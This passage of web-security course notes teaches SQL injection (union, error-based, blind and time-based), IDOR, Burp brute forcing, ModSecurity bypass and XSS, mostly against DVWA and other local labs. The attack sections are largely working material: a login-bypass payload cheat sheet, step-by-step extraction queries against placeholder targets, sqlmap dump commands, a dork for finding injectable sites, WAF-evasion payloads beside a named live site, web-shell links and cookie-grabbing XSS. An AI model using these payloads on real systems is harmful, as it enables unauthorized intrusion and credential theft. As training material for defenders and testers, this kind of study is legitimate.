6. Missing Function Level Access Control
7. Broken Authentication and Session Management
8. Invalidated Redirects and Forwards
9. Security Misconfigurations
10. Using Components with known Vulnerabilities

OWASP 2013 --> Stable
OWASP 2017 --> Data sufficient
	https://www.owasp.org/images/7/72/OWASP_Top_10-2017_(en).pdf.pdf

https://cybermap.kaspersky.com/
https://www.fireeye.com/cyber-map/threat-map.html

DBMS
====
DataBase Management System
--------------------------
Where, how, when which data is suppose to be stores in which table, in which database, in which column.
DBA --> Database Administrator
	The Administrator of database, which manages the whole environment's database. DBA need to have the complete knowledge of a programing languages --> SQL

SQL --> Structured Query Language.
This is the programing languages which is used by the dba or any user to interact with the database.

Source --> Delhi
Destination --> Jalandhar
Date --> 10/6/2018
Class -> 2T

Select trains from database where source="Delhi" and destination="Jalandhar" having class="2T" on date=" 10/06/2018"

Queries
=======
1. Insert
	Insert into <table_name>(Column_Name) VALUES(Values to be inserted);

	INSERT INTO `info`(`Name`, `Salary`, `Address`, `Gen`) VALUES (Prashant, 10000, Roshan Garden Najafgarh, M);

2. Select
	Select * from <table_name>;

	Select * from info;

3. UPDATE
	Update <table_name> SET <value to change> where <condition>;

	UPDATE info SET Salary=30000 where Name="Abhijeet Singh";

4. Where
	It is a condition

	Select * from info where salary > 15000;
	Select * from info where name like "A%";

5. Delete
	DELETE from info WHERE Name="Abhijeet Singh";

6. AND
	SELECT * FROM `info` WHERE salary>=20000 and Gen='M';

7. Create
	Create table <table_name>(columns_name data_Type Length);

	CREATE table training(Name Text(20), Age int(3), Gender Text(1));

8. Order By
	It will arrange the data into either ascending order or in descending order

	SELECT * FROM `training` ORDER BY Name;

9. Group By
	To group the data

	SELECT * FROM `training` GROUP by Gender;

10. UNION
	SELECT name from info UNION select name from training;

	SELECT name,gen,salary,address from info UNION SELECT name,gender,age,null FROM training;

11.  Information_schema -->Meta database

SQL Injection
=============
Authentication Bypass
---------------------
	To bypass the authentication on any login form and gain teh access as the administrator.
	There are 4 types of authentication
		1. Basic Authentication
		2. Integrated Authentication
		3. Digest Authentication
		4. Form Based Authentication

Logic Gates
===========
AND Gate --> If any of the value is false, then the ans will be flase

	0 and 0 = 0
	0 and 1 = 0
	1 and 0 = 0
	1 and 1 = 1

OR --> If any of the value is true, then the answer will be true

	0 or 0 = 0
	0 or 1 = 1
	1 or 0 = 1
	1 or 1 = 1

1 ---> True ---> Administrator

' ---> Single inverted Comma ---> Use to break the SQL query

1'or'1'='1
select '1'or'1'='1'

Username --> 1'or'1'='1 always true
Password --> 1'or'1'='1 always true
		Administrator Login
		x'or'x'='x ---> true

Cupons| Promo Code ---> 1'or'1'='1


Cheat sheet
===========
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055


LVS setup
=========
Lucideus Vulnerable Simulator
=============================

DVWA --> Damm Vulnerable Web Application
----------------------------------------
	Open Source

LVS_1.zip
1. Copy the zip file
2. Paste it in C:\xampp\htdocs
3. Extract the zip file
				LVS_1
4. Start the xampp server
		Apache
		MySQL
5. Start the browser
		127.0.0.1/lvs_1
6. Click on the link --> lvs111

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 10
==========
Insecure Direct Object References
---------------------------------
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.

www.bank.com/aofn/akjf.php?id=12 ---> Account1
www.bank.com/aofn/akjf.php?id=11 ---> Account2
www.bank.com/aofn/akjf.php?id=10 ---> Account3
	if I will change the id value to another ID value, and can have the access of another account, it is considered to be Insecure Direct Object References

http://127.0.0.1/wave1/wave1/insecure/myaccount.php?Id=1
				User ID	= 1
				Username = Admin
				Password= password

If I change the value of .php?Id=1 to .php?Id=2, then I can have the access of another account whose ID is 2

Oyorooms.com/afogn/adifn.php?ID=abhijeet.php
Oyorooms.com/afogn/adifn.php?ID=admin.php

id = 1 ---> 1 represents a token containing a value of --> Username, password and other information.

Get Parameter
-------------
php?Id=1 -->
Something = something

Sensitive Data Exposure
=======================
	Personal Data
	Credential Data
	Banking Data
	Economical Data
	Financial Data

1. When data is transmitted in the url, that is your crendentials are transmitted via GET Parameter.
	username=user&password=pass&sumbit=submit
2. When data is stored in plain text form rather then hashed or encrypted form.
3. When data is stored in the text file rather then to be stored in the databsae.

	 Id 	Interest 	Gender 	Username 	Password
	 -----------------------------------------------
	1 	    Badminton 	Female 	admin 		Pa$$woRd
	2 		Football 	Male 	admin2 		paSSwOrd


Consider who can gain access to your sensitive data and any backups of that data. This includes the data at rest, in transit and even in your customers’ browsers. Include both external and internal threats. The Sensitive Data can be exposed in the plain text or in any hash format.

DVWA
====
Damn Vulnerable Web Application
-------------------------------
	It is a web application which is Vulnerable by default. This application is used for testing the skills and to perform web application attacks passed by OWASP.

	Could not connect to the database - please check the config file.
	1. Goto c:\xampp\htdocs\dvwa\dvwa-1.0.8
	2. Open the config folder
	3. config.inc.php
	4. $_DVWA = array();
		$_DVWA[ 'db_server' ] = 'localhost';
		$_DVWA[ 'db_database' ] = 'dvwa';
		$_DVWA[ 'db_user' ] = 'root';
		$_DVWA[ 'db_password' ] = 'p@ssw0rd';

		change the line --> $_DVWA[ 'db_password' ] = 'p@ssw0rd';
							$_DVWA[ 'db_password' ] = '';
		save the file

Username:admin
password:password


SQL Injections
==============
	Where an attacker passes the malicious SQL commands just to gain the juicy information from the database.
	SQLi

UNION BASED SQL INJECTION
=========================
	Where an attacker uses the union command to collect the information and merge it into one table. He passes malicious commands and queries in the database to do so.

DEMO
====
DVWA ---> Security:Low
			SQL Injection
Step 1
======
To find 'GET' parameter.
	something=something
		php?id=something
		php?id=cat
		php?id=1
		php?id=query

	Either you click on some link of the web application|site or enter something in the search box.

	http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#

Step 2
======
To generate a SQL error, to break the query.
	1
	1'

	http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1'&Submit=Submit#

	You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

	'select * from table '
	'select * from table' '

Step 3
======
To count the number of columns, in the web application.
	For counting the number of columns, I will use order by

	http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
		Shows me data
		This query means that I am asking the database to arrange the data according to column number 1

	http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 2--+&Submit=Submit#
		Shows me data
		This query means that I am asking the database to arrange the data according to column number 2

	http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
		Gives me error
			Unknown column '3' in 'order clause'
		This query means that I am asking the database to arrange the data according to column number 3
		But there is no column number 3 --> so it will generate an error

order by n--+
	n starts from 1 and ends when i receive an error for the value of n
	--+ ---> To comment out
			if there is any data passed down after --+, it will not execute at all.

	There are 2 columns, in the database.

Step 4
======
To merge the data of all the columns, using UNION command.
	union select 1,2,...,n-1--+
	n=3
	union select 1,2--+


http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select 1,2--+&Submit=Submit#

		ID: 1' union select 1,2--
		First name: admin
		Surname: admin

		ID: 1' union select 1,2--
		First name: 1
		Surname: 2

http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select database(),version()--+&Submit=Submit#

	database() --> database name
	version()  --> Database Version Number

	ID: 1' union select database(),version()--
	First name: admin
	Surname: admin

	ID: 1' union select database(),version()--
	First name: dvwa
	Surname: 10.1.25-MariaDB

Step 5
======
To call database ki ma --> information_schema, for getting the information about the table names
	Information_schema --> it is meta table --> it contains the name of tables and columns which are present in the database.
		information_schema.tables
					|-> It stores the name of all the table names in the database.

	union select table_name,2 from information_schema.tables--+
					or
	union select 1,table_name from information_schema.tables--+

	http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select 1,table_name from information_schema.tables--+&Submit=Submit#

Step 6
======
I will again call database ki maa for columns names in the table names as users
	information_schema
	information_schema.columns

	union select 1,column_name from information_schema.columns where table_name="users"--+


ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
First name: admin
Surname: admin

ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
First name: 1
Surname: user_id

ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
First name: 1
Surname: first_name

ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
First name: 1
Surname: last_name

ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
First name: 1
Surname: user

ID: 1' union select 1,column_name from information_schema.columns where table_name="users"--
First name: 1
Surname: password


	column name --> user_id
					first_name
					Last_name
					user
					password

Step 7
======
To retreive data from the above data.
	DVWA --> Users --> (User_id,first_name,Last_name,user,Password)

	union select 1,group_concat(User_id,0x0a,first_name,0x0a,Last_name,0x0a,user,0x0a,Password,0x3a) from users--+

	1
	admin
	admin
	admin
	5f4dcc3b5aa765d61d8327deb882cf99

	2
	Gordon
	Brown
	gordonb
	e99a18c428cb38d5f260853678922e03 --> abc123

	3
	Hack
	Me
	1337
	8d3533d75ae2c3966d7e0d4fcc69216b --> charley

	4
	Pablo
	Picasso
	pablo
	0d107d09f5bbe40cade3de5c71e9e9b7

	5
	Bob
	Smith
	smithy
	5f4dcc3b5aa765d61d8327deb882cf99

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 11
==========
ERROR BASED SQL INJECTION
=========================
Error based SQL Injection is type of SQL Injection technique to make the error message show Data in just the form of Database Errors instead of SQL Syntax error like in Union Based, for when we have a blind vulnerability that shows error, so we can extract sensitive data from the database directly.

The errors are very useful during the time of development of a web application but they should be disabled on a Live Website, because errors always shows the Internal Sensitive Data of the Database.

Error Based SQL Injection works on the ASP Technology (asp.net , aspx) which is a open source server side web application Developed by Microsoft, using the Microsoft MSSQL Server.


TRUE CONDITION :
---------------

Here 1 is True and 0 is False.

AND GATE REPRESENTATION

A    |    B    |    Resultant |
------------------------------|
0    |    0    |    0         |
0    |    1    |    0         |
1    |    0    |    0         |
1    |    1    |    1         |

Checking the Last True Condition it states :

1 & 1  = 1    ie;   1*1=1  or True*True = True

MAKING THIS TRUE CONDITION FALSE

1 & 0  = 0    ie;   1*0=0  or True*False = False


Error Based SQL Injection works by generating a error condition in the SQL Syntax, so that the Database reverts back with the Error along with the Sensitive Data.


DEMONSTRATION
===============

Normally a SQL Syntax can goes like :

?id=10  |  ?id=10 and 1 =1 ;			//TRUE
Which means a Condition is true and it will revert a Genuine Website.

- So, we can change and can create a Error in the SQL Command by :
        ?id=10 and 1=0;					//FALSE
Which will create and revert a Errors of the Database.

CONDITIONS OF ERROR BASED SQLI
===============================
= Only One Query can execute at a Particular time, not like finding out the Table Names etc we do on Union Based.
= It works on the basis of Last In First Out (LIFO).
= Only the Top Table of the Database can be accessed at a single particular time. Same  goes for Columns and then for Rows.

----
First as same as Union Based SQLI, we start finding the number of columns and the Vulnerable column. Suppose the vulnerable column is 10.

After creating a Error, We will start executing the command and extracting the data from the First Table from the Database.

For selecting the Top First Table (Cause we cannot directly go a “n” number column),

=	?id=10 and 1=0 select top 1 table_name from information_schema.tables

This will extract and give the Data of the First Table from the Database Including its name and other entities. If the Data is Juicy then extract it, else we go for the next tables and columns.

----

For deselecting the Top/Current Table and selecting/extracting the next table,

=	?id=10 and 1=0 select top 1 table_name from information_schema.tables where table_name not in (“Name of the previous tables”)

Here we are selecting the next Top Table excluding the Previous one and then extracting its data through the Database Errors. For eg. if the First Top Table is named as “Images”, the query will be :
?id=10 and 1=0 select top 1 table_name from information_schema.tables where table_name not in (“images”, "guestbook")

----

After getting through our Juicy Table, we go for the data which are situated in there columns.

=	?id=10 and 1=0 select top 1 column_name from information_schema.columns where table_name not in (“images”)

Here we get the data of the extracted of the Columns which are not of the Table named Images.

DEMO
====

http://www.target.com/index.php?id=-1 Union Select 1,2,3,4,5,6--+

http://www.target.com/index.php?id=1 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--+
		we Will Get The Version Printed on The WebPage


http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
		Here is Our Query To Get The  Database.


http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
		Now We Have To Get The Tables. As We Want Tables From Primary Database .
		Here Is The Query For Tables From Primary Database.

		Increase The Value Of Limit as LIMIT 0,1 to LIMIT 1,1 LIMIT 2,1 LIMIT 3,1 Until You Get Your Desired Table Name .


http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xADMIN limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
		Now We Have to Get The Column Names From The Table Name. We Got Table Of Admin. So Lets Get The Columns From Table Admin . Here Is The Query For Getting Column Names From The Table Admin.

		To Get The Columns From The Table Admin we Have to Encode It In HEX and Then We Can Execute Our Query.
		Here Is that PART in Our Query.

		Table_name=ADMIN
		Here Is The HEX Value of ADMIN=61646d696e
		And Put it With 0x to Build Our Correct Query.


http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
		Increase The Value Of LIMIT to LIMIT 0,1 LIMIT 1,1 LIMIT 2,1 until we Get The Column Name Like Username and Password.


http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME_1,0x3a,COLUMN_NAME_2) as char),0x3a)) from TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
		After We Get The Column names Like Username And Password. Next Step Is To Extract Data From These Columns.

		WE Put The TABLENAME=Admin
		And
		Column_name_1=username
		Column_name_2=password


http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password) as char),0x3a)) from admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+


STACKED QUERY SQL INJECTION
============================
Stacked Query SQL Injection is the one which can execute by terminating the original query and adding a new one, it will be possible to modify data and call stored procedures like creating, deleting and modifying the Database with there entities. This technique is massively used in SQL injection attacks and understanding its principle is essential to a sound understanding of this security issue.

This can done by SQL Injection Automated Tools like “SQLMAP” etc.

SQLMAP --> Python based Command Line TOOL for automate sql injection
	http://sqlmap.org/
	Python 2.7 --> https://www.python.org/download/releases/2.7/
HAVIJ --> Illegal tool, GUI based


SQLMAP
======
1.
	sqlmap.py
2. To test if the website id up or not or if it is vulnerable or not
	sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1
3. To get the database ----> --dbs
	sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 --dbs

available databases [2]:
[*] acuart
[*] information_schema

4. To get the tables
	sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 -D acuart --tables

Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

5. To get the columns
	sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 -D acuart -T users --columns

Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

6. To dump the data from the columns
	sqlmap.py -u https://www.xyz.com/seflgn/kjf.php?id=1 -D acuart -T users -C name,uname,pass --dump

Database: acuart
Table: users
[1 entry]
+------------+-------+------+
| name       | uname | pass |
+------------+-------+------+
| John Smith | test  | test |
+------------+-------+------+

HAVIJ
=====
GUI Based tool


Google Dorks
============
Advance Google Searching Techniques
-----------------------------------
Google Hacking Database.

Arijit Singh

When ever we search anything on google, google seach enging shows us the data into 3 different colors.

	Blue --> Headings --> Titles
	Green -> Links and urls
	Black -> Content

	intitle: inception
	inurl: inception
	intext: inception

	title--> movie
	url --> inception
		intitle:movie and inrul:inception

	indexof:/inception

	hacking filetype:pdf

	SQL Injection Vulnerable Web Sites
	----------------------------------
	inurl:php?id=

	inurl:/view/viewer_index.shtml

Session 12
==========
Introduction to Firewall
------------------------
Firewall
--------
	It is an extra security layer, which helps me securing our web application and web site. It acts as the middle layer between the data transmission of user and the server.
	Firewall act as the filter. It filters the unwanted packets and malicious packets. Firewall works on the basis of signature and permutation and combination of queries which are transmitted by the user. Knowledgebase --> It acts just like database for signatures and combinations.

There are two types of firewall:
1. Software Solution Firewall
2. Hardware Solution Firewall

Software Solution Firewall
--------------------------
	These are the softwares which are installed in the server.
	Microsoft windows Firewall

Hardware Solution Firewall
--------------------------
	They are the hardwares, which act as the man in the middle, and filters the packet which are malicious.
	MOD Security

WAF --> Web Application Firewall
--------------------------------
MOD Security
------------

Installation of Mod Security
============================
Installing and configuring ModSecurity

Step 1: open terminal and type
        $ apt-get update
        $ apt-get upgrade
        $ apt-get install apache2

Step 2: $ sudo apt-get install libapache2-modsecurity

Step 3: Now we need to place a modsecurity.conf configuration file into the /etc/modsecurity
        $ sudo cp /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf
 now open
        $ sudo nano /etc/modsecurity/modsecurity.conf
Find this line:
        SecRuleEngine DetectionOnly

and change it to:

        SecRuleEngine On

Step 4: now check the apache2 log directory:
        $ ls /var/log/apache2

You should see three files: access.log, error.log and other_vhosts_access.log.

Now restart the apache2 service and check this directory again
        $ sudo service apache2 reload
        $ ls /var/log/apache2
A new log called modsec_audit.log was created

Step 5: now check the modsecurity-crs direcotry
        $ ls /usr/share/modsecurity-crs/
 the directories: activated_rules, base_rules, experimental_rules and optional_rules

Step 6: for activate all of the rules in the base_rules and optional_rules directories so execute the following commands in a terminal:
        $ cd /usr/share/modsecurity-crs/base_rules
        $ for f in * ; do sudo ln -s /usr/share/modsecurity-crs/base_rules/$f /usr/share/modsecurity-crs/activated_rules/$f ; done

        $ cd ..
        $ cd optional_rules
        $ cd /usr/share/modsecurity-crs/optional_rules
        $ for f in * ; do sudo ln -s /usr/share/modsecurity-crs/optional_rules/$f /usr/share/modsecurity-crs/activated_rules/$f ; done

        $ cd ..
        $ cd experimental_rules
        $ cd /usr/share/modsecurity-crs/experimental_rules
        $ for f in * ; do sudo ln -s /usr/share/modsecurity-crs/experimental_rules/$f /usr/share/modsecurity-crs/activated_rules/$f ; done


Step 7: we need to tell apache where to find the activated rules. Open the /etc/apache2/mods-available/security2.conf file.
        $ sudo nano /etc/apache2/mods-available/security2.conf

        At the end of the file just before </IfModule> enter the following lines:
        Include "/usr/share/modsecurity-crs/*.conf"
        Include "/usr/share/modsecurity-crs/activated_rules/*.conf"
        save it

Step 8: We must enable the headers module, this allows ModSecurity to control and modify the HTTP headers for both requests and  responses.
        $ sudo a2enmod headers
        Now restart apache:
        $ sudo service apache2 restart


cd /etc/apache2/sites-available
ls ---> 000-default.conf
sudo nano 000-default.conf
edit
	ProxyPass --> Web application IP
	ProxyPassReverse --> Web application IP
save and exit
sudo service apache2 restart

Bypassing MOD_SECURITY
======================

union select 1,2--+
	Block
Mix Cases
	UnIoN SeLeCt 1,2--+
Inline Executable Comments
	/*!......*/
	/*!UnIoN*/ /*!SeLeCt*/ 1,2--+
	/*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2--+
	/*!UnIoN*/ /*!SeLeCt*/ 1,table_name from /*information_schema.tables*/--+


	http://www.slightergolf.com

BLIND SQL INJECTION
===================
	Blind SQL injection is a type of sql injection attack that ask the database true or false questions and determine the answer based on the application response. This attack is often used when the web application is configured to show generic error message, but has not mitigated the code that is vulnerable to SQLi. This type of sql injection is identical to normal sql injection, the only is the data retreived from the database.
	1. Blind Boolean
	2. Time Based SQL Injection

http://newsletter.com/items.php?id=2
------------------------------------
select title,description from items where id=2
----------------------------------------------

http://newsletter.com/items.php?id=2 and 1=2

select title,description from items where id=2 and 1=2

Demo
====
	1
	1'
	1' and 1=0 # ---> False --> Did not gave me data
	1' and 1=1 # ---> True --> It gave me data
	1' and 1=0 order by 1 # --> No Result ---> Generic error
	1' and 1=1 order by 1 # --> Result --> normal result
	1' and 1=0 order by 2 # --> No result
	1' and 1=1 order by 2 # ---> Result
	1' and 1=0 order by 3 # ---> No Result
	1' and 1=1 order by 3 # ---> No Result ---> True ---> there are 2 number of columns

	1' and 1=0 union select 1,2 #
			ID: 1' and 1=0 union select 1,2 #
			First name: 1
			Surname: 2

	1' and 1=1 union select 1,2 #
			ID: 1' and 1=1 union select 1,2 #
			First name: admin
			Surname: admin

			ID: 1' and 1=1 union select 1,2 #
			First name: 1
			Surname: 2

	1' and 1=0 union select NULL,2 # --> nO dATA

	1' and 1=1 union select null,2 #---> 	 Shows Data
			ID: 1' and 1=1 union select null,2 #
			First name: admin
			Surname: admin

			ID: 1' and 1=1 union select null,2 #
			First name:
			Surname: 2

	1' and 1=0 union select null,substr(@@version,1,1)=5 #
			ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
			First name:
			Surname: 0

	1' and 1=0 union select null,substr(@@version,1,1)=4 #
			ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
			First name:
			Surname: 0

	1' and 1=0 union select null,substr(@@version,1,1)=3 #
			ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
			First name:
			Surname: 0

	1' and 1=0 union select null,substr(@@version,1,1)=2 #
			ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
			First name:
			Surname: 0

	1' and 1=0 union select null,substr(@@version,1,1)=1 #
			ID: 1' and 1=0 union select null,substr(@@version,1,1)=1 #
			First name:
			Surname: 1

	1' and 1=0 union select null,substr(@@version,2,1)=1 #
			ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
			First name:
			Surname: 0

	1' and 1=0 union select null,substr(@@version,2,1)=2 #
			ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
			First name:
			Surname: 0

	1' and 1=0 union select null,substr(@@version,2,1)=3 #
			ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
			First name:
			Surname: 0

	1' and 1=0 union select null,substr(@@version,2,1)=0 #
			ID: 1' and 1=0 union select null,substr(@@version,1,1)=5 #
			First name:
			Surname: 1

	1' and 1=0 union select null, table_name from information_schema.tables #

	1' and 1=0 union select null, table_name from information_schema.tables where table_schema != 'information_schema' and table_schema != 'mysql' #


	 10.1.25-MariaDB
	 substr(@@version,1,1) ----> 1
-
x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 13
==========
Time Based SQL Injection
========================
	This type fo sql injection relies on the database pausing for a specific amount of time, when returning the results, indicating successful SQL Query execution.
		sleep()
		delay()
		hibernate()
	Basic syntax
		select if(expression,true,false)

	This type of SQL injection is sub type of Blind Based SQL Injection. This is considered to by our last resort.
	sleep(3) --> sleep the database for 3 seconds and then give me result.

DEMO
====
	1 --> result

	1' --> no result
	Instantly reloading the page

	1' - sleep(3) #
			ID: 1' - sleep(3) #
			First name: admin
			Surname: admin

	1' - if(mid(version(),1,1)='5', sleep(3),0) #
			ID: 1' - if(mid(version(),1,1)='5', sleep(3),0) #
			First name: admin
			Surname: admin
		This query will load the response Instantly.

	1' - if(mid(version(),1,1)='4', sleep(3),0) #
			ID: 1' - if(mid(version(),1,1)='5', sleep(3),0) #
			First name: admin
			Surname: admin
		This query will load the response Instantly.

	1' - if(mid(version(),1,1)='3', sleep(3),0) #
			ID: 1' - if(mid(version(),1,1)='5', sleep(3),0) #
			First name: admin
			Surname: admin
		This query will load the response Instantly.

	1' - if(mid(version(),1,1)='2', sleep(3),0) #
			ID: 1' - if(mid(version(),1,1)='5', sleep(3),0) #
			First name: admin
			Surname: admin
		This query will load the response Instantly.

	1' - if(mid(version(),1,1)='1', sleep(3),0) #
			ID: 1' - if(mid(version(),1,1)='1', sleep(3),0) #
			First name: admin
			Surname: admin
		This query will load the response after a delay of 3 seconds.
		which means, that the first character of version is '1'

POST PARAMETER INJECTION
========================
	We will tamper the data, using third part application.
		Burp Suite
		Tamper Data

Arbitrary File Upload
=====================
	When the web application askes you to input or upload some kind of document, but instead the person uploads some kind of malicious file. Like darkComet.exe, b374k.php
		b374k.php ---> PHP Shell --> PHP Trojan
				Connection from dark Comet ---> connection via a php code, server ka remote access.

https://pastebin.com/raw/KpNsxj0c
https://pastebin.com/raw/ATJE7VdZ

Tools To Automate VAPT
======================
Accunetix --> https://www.acunetix.com/vulnerability-scanner/wvs-demo-requested/

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 14
==========
Introduction To Burp Suite
--------------------------
	Brute Forcing

Anand Prakash
=============
	Hack Into any fb account
				  twitter account
				  OLA and Uber rides for free
				  Food For Free

www.facebook.com ---> wrong credentials ---> Forget Password --> OTP
					4 digits ---> 0000-9999 ---> 10,000 different number
												5 min
					5 wirng otp ---> block

m.facebook.com ---> forget password ---> OTP
					Brute Forcing
					Unlimited try

Burp Suite Download Link
		   https://portswigger.net/burp/communitydownload

I Will open the Brute Force Page of DVWA
Browser setting ---> proxy settings
1. In the broser ---> goto settings ---> Options
2. Goto Proxy ---> settings
3. Tick Manual Proxy Configuration - Radio Button
4. I will enter the IP Address and the port number
	IP Address --> 127.0.0.1
	Port NUmber --> 8080
5. Tick --> Use  proxy for all protocols
6. No Proxy For ---> localhost, 127.0.0.1 ---> Delete It ---> click on ok
7. I will start Burp Suite
========================================================================
8. Enter the credentials in the web page --> click on login
9. Burp will glow ---> data in the burp has been intercepted
		In burp ---> i can see the data inputed by the user.
10. I will select all the data ----> right click ---> send to intruder
11. Goto Intruder Tab ---> Position Tab
12. Select all the data ---> clear all the makrups ---> click on clear button
13. Select the user name and add the markup ---> by clicking ADD button
14. Select the Password and add the markup ---> by clicking ADD button
				Right Pane
15. I will select the attacking type ---> By Default it is sniper, But i will change it to Cluster Bomb
16. Nevigate to payload tab
17. Add user name in the payload number 1
18. Add password name in the payload number 2
19. Nevigate to options tab
20. grep match <-- Search this box
21. Clear all the content inside grep match
22. Paste the successful message in that box
		Welcome to the password protected area admin


Welcome to the password protected area admin

Command Execution Vulnerability
===============================
	In many web applications, there are parameter, which ask for certain type of value. Instead of providing them the exact value, we make them to execute certain terminal commands
			CMD
			Linux --> Bash
	| --> pipe function ---> output of first command will be the input of second command

File Inclusion Vulnerability
============================
	1. Local File Inclusion Vulnerability
		../../
		../
	2. Remote File Inclusion Vulnerability

-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-

Session 15
==========
Introduction to java script
===========================
Java --> Programming language ---> Used for making applications and softwares
Javascript --> It is a scripting language, which helps in running some kind of script on the web applications.

<script>

......
......
......
......
</script>


<html>
<head>
<title>Java Script</title>
</head>
<body>
<script>
alert("Hacked By Rishi Raj and Team");
</script>
</body>
</html>

2 Number Addition
=================
html>
<head>
<title>Java Script</title>
</head>
<body>
<h1>Calculator</h1>
<form>
First Number :<input type="text" id="one"><br>
Second Number:<input type="text" id="two"><br>
<button onclick="addition()">Add</button>
</form>
</body>

<script>
function addition()
{
var onee = document.getElementById("one").value;
var twoo = document.getElementById("two").value;
var sum= +onee + +twoo;
alert(sum);
document.write(sum);
}
</script>

</html>

XSS --> Cross Site Scripting
============================
	In which the web application or the web site executes the html tags as the normal input and displays the data as that using htmls tags.

	In this type of attack attacker can make the target to do what ever he wants to do. An attacker can craft a link and send it to the target, when the target will open the crafter link, then the malicious work of the attacker is carried out.

There are three types of XSS
----------------------------
1. Reflected XSS
2. Stored XSS
3. DOM Based XSS

1. Reflected XSS
================
	In this type of xss, the attacker can attack a person one time using the crafted link. The attacker can inject the web application just once, then the malicious query will get away.

	<h1>abhijeet</h1>
	<script>alert("hacked")</script>
	<script>alert(document.cookie)</script>
	<iframe src="http://www.lucideus.com"></iframe>

